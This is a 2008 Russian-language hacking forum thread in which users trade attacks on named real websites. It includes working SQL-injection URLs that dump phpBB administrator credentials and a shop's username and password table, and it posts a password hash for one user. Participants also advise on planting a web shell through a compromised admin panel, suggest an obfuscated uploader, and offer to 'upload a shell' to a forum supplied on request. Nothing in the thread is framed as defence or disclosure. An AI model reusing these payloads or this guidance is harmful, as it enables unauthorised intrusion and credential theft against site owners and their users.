 |
|
12.08.2008, 15:51
|
|
Участник форума
Регистрация: 19.03.2008
Сообщений: 108
С нами:
9550090
Репутация:
137
|
|
Сообщение от superboys
да хоть бы показал синтаксис)
а маны кто будет читать ?
|
|
|
12.08.2008, 16:01
|
|
Познающий
Регистрация: 01.02.2008
Сообщений: 53
С нами:
9618766
Репутация:
5
|
|
в манах такого нет) Да ужо всё наашёл хэш Lupo:b7dba5a1bc3605a87b59ac8147512c97
|
|
|
|
12.08.2008, 20:59
|
|
Постоянный
Регистрация: 16.03.2007
Сообщений: 380
С нами:
10081287
Репутация:
568
|
|
http://evo.nightspirits.net/indexframe.php?razdel=news&comm=999999999'+union+s elect+1,2,3,concat_ws(0x3a,username,user_password) ,5,6,7,8,9+from+phpbb_users+where+user_level=1+lim it+0,1/*
piton; 526635
дай форум залью шелл )
Последний раз редактировалось sabe; 13.08.2008 в 08:47..
|
|
|
|
12.08.2008, 21:17
|
|
Познающий
Регистрация: 27.05.2008
Сообщений: 51
С нами:
9450895
Репутация:
41
|
|
Посмотрите если инклуд
http://admzven.ru/cgi-bin/document.pl?action=showFullDoc&p=1'
|
|
|
|
12.08.2008, 23:05
|
|
Участник форума
Регистрация: 25.05.2007
Сообщений: 147
С нами:
9981026
Репутация:
728
|
|
Проблема такая - есть админка, есть возможность редактирования страниц ( в т.ч. вставка произвольного пхп кода, который выполнится ) ( все страницы в виде site.com/kkk.php?id=x ) , но вставив код веб-шелла в одну из страниц и перейдя по ней я увидел вместо шелла какие-то каракули =/ Что можно сделать чтобы получить веб-шелл ?
Евал шелл имеется
|
|
|
|
12.08.2008, 23:18
|
|
Постоянный
Регистрация: 25.02.2008
Сообщений: 331
С нами:
9583330
Репутация:
189
|
|
0nep@t0p, попробуй вставить зашифрованный код.. или как вариант - код простенького аплоадера, а через него ( если он выполнится ) заливай шел.. но если каракули там скорее всего MIME type не для выполнения стоит
|
|
|
|
13.08.2008, 01:44
|
|
Познающий
Регистрация: 01.02.2008
Сообщений: 53
С нами:
9618766
Репутация:
5
|
|
Сообщение от sabe
piton;cazzo
дай форум залью шелл )
http://nightspirits.net/forum/ на лови
|
|
|
|
14.08.2008, 02:41
|
|
Новичок
Регистрация: 04.09.2007
Сообщений: 13
С нами:
9834147
Репутация:
4
|
|
Доброго времени суток всем.
Поможите пожалуйста столкнулся с проблемой при вводе корректной sql-инъекции(где имена полей угаданы после суточного ручного перебора) сайт выдаёт свою дефолтную страницу, пример:
_http://www.tarmatrade.ee/index.php?cat=-1+union+select+1,concat_ws(0x3a,nimi,parool)+from+ tarma_kasutajad+limit+0,1/*
для наглядности зделаем ошибку в поле с именем nimi, заменим на name
_http://www.tarmatrade.ee/index.php?cat=-9999+union+select+1,concat_ws(0x3a,name,parool)+fr om+tarma_kasutajad+limit+0,1/*
и картина уже совершенно иная.
Как всё же обойти эту защиту и прочитать результат запроса. (пробовал через Navisckope, но то ли руки кривые, то ли...)
|
|
|
|
15.08.2008, 07:59
|
|
Участник форума
Регистрация: 23.05.2008
Сообщений: 121
С нами:
9457097
Репутация:
133
|
|
2zjuk@ полей для вывода нет выход только слепая иньекция )
|
|
|
|
15.08.2008, 14:02
|
|
Новичок
Регистрация: 04.09.2007
Сообщений: 13
С нами:
9834147
Репутация:
4
|
|
2zjuk@ полей для вывода нет выход только слепая иньекция )
Это печально =(((
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
